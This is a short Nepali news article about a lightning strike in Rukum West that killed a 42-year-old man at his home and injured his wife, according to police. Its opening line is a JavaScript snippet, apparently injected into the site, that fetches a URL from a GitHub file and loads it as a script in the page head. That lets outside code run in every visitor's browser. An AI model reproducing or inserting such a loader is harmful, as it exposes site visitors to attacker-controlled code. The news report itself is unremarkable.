;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २४,
रुकुम पश्चिम । रुकुम पश्चिममा चट्याङ्ग लागेर एक जनाको ज्यान गएको छ । मुसीकोट नगरपालिका ६, गवारीका अन्दाजी ४२ वर्षीय भीमबहादुर बोहराको गएराति चट्याङ्ग लागेर ज्यान गएको हो ।
चट्याङ्ग लागेका बोहराको घरमै ज्यान गएको प्रहरीले जनाएको छ । बोहराको शव पोष्टमार्टमका लागि जिल्ला अस्पताल सल्ले लगिएको जिल्ला प्रहरी कार्यालय रुकुमपश्चिमका सूचना अधिकारी प्रहरी निरीक्षक कपिल शाहीले बताए ।
चट्याङ्ग लागेर बोहराकी ३५ वर्षीया श्रीमती सीता घाइते हुनभएकाे प्रहरी निरीक्षक शाहीले जानकारी दिए । घाइते सीताको जिल्ला अस्पताल सल्लेमा उपचार भइरहेको छ । सीताको दायाँ खुट्टा, दायाँ हात तथा शरीरको दायाँतर्फको भागमा चोट लागेको छ ।
फेसबुक प्रतिक्रियाहरु